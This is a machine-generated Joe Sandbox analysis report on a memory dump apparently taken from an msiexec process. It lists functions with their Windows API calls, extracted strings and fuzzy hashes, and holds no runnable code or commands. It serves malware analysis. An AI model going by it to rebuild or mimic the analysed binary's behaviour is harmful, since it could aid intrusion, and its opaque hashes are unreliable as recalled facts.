                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                              • String ID: \systemroot
                                                              • API String ID: 4173585201-1821301763
                                                              • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                              • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                              Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscpy
                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                              • API String ID: 1284135714-318151290
                                                              • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                              • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                              Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                              • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                              • strchr.MSVCRT ref: 0040C140
                                                              • strchr.MSVCRT ref: 0040C151
                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                              • memset.MSVCRT ref: 0040C17A
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                              • String ID: 4$h
                                                              • API String ID: 4019544885-1856150674
                                                              • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                              • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                              Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                              • String ID: 0$6
                                                              • API String ID: 4066108131-3849865405
                                                              • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                              • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                              Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004082EF
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memset.MSVCRT ref: 00408362
                                                              • memset.MSVCRT ref: 00408377
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 290601579-0
                                                              • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                              • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                              Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memchr.MSVCRT ref: 00444EBF
                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                              • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                              • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                              • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                              • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                              • memset.MSVCRT ref: 0044505E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memchrmemset
                                                              • String ID: PD$PD
                                                              • API String ID: 1581201632-2312785699
                                                              • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                              • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                              Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                              • GetParent.USER32(?), ref: 00409FA5
                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                              • String ID:
                                                              • API String ID: 2163313125-0
                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                              Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$wcslen
                                                              • String ID:
                                                              • API String ID: 3592753638-3916222277
                                                              • Opcode ID: c59fdb48a3366d700cf217102287a2c2b572dc418e1d07a2ad87836d96891f11
                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                              • Opcode Fuzzy Hash: c59fdb48a3366d700cf217102287a2c2b572dc418e1d07a2ad87836d96891f11
                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                              Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A47B
                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                              • String ID: %s (%s)$YV@
                                                              • API String ID: 3979103747-598926743
                                                              • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                              • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                              Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                              • String ID: Unknown Error$netmsg.dll
                                                              • API String ID: 2767993716-572158859
                                                              • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                              • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                              Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 3176057301-2039793938
                                                              • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                              • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                              Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • database %s is already in use, xrefs: 0042F6C5
                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                              • database is already attached, xrefs: 0042F721
                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                              • unable to open database: %s, xrefs: 0042F84E
                                                              • out of memory, xrefs: 0042F865
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                              • API String ID: 1297977491-2001300268
                                                              • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                              • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                              Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                              • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                              • String ID: ($d
                                                              • API String ID: 1140211610-1915259565
                                                              • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                              • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                              Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                              • String ID:
                                                              • API String ID: 3015003838-0
                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                              Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00407E44
                                                              • memset.MSVCRT ref: 00407E5B
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                              • wcscpy.MSVCRT ref: 00407F10
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                              • String ID:
                                                              • API String ID: 59245283-0
                                                              • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                              • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                              Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                              • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                              • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                              Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                              • memset.MSVCRT ref: 00413ADC
                                                              • memset.MSVCRT ref: 00413AEC
                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                              • memset.MSVCRT ref: 00413BD7
                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                              • String ID: 3A
                                                              • API String ID: 3300951397-293699754
                                                              • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                              • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                              Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                              • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                              • String ID: strings
                                                              • API String ID: 3166385802-3030018805
                                                              • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                              • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                              Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0041249C
                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                              • wcscpy.MSVCRT ref: 004125A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                              • String ID: r!A
                                                              • API String ID: 2791114272-628097481
                                                              • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                              • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                              Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
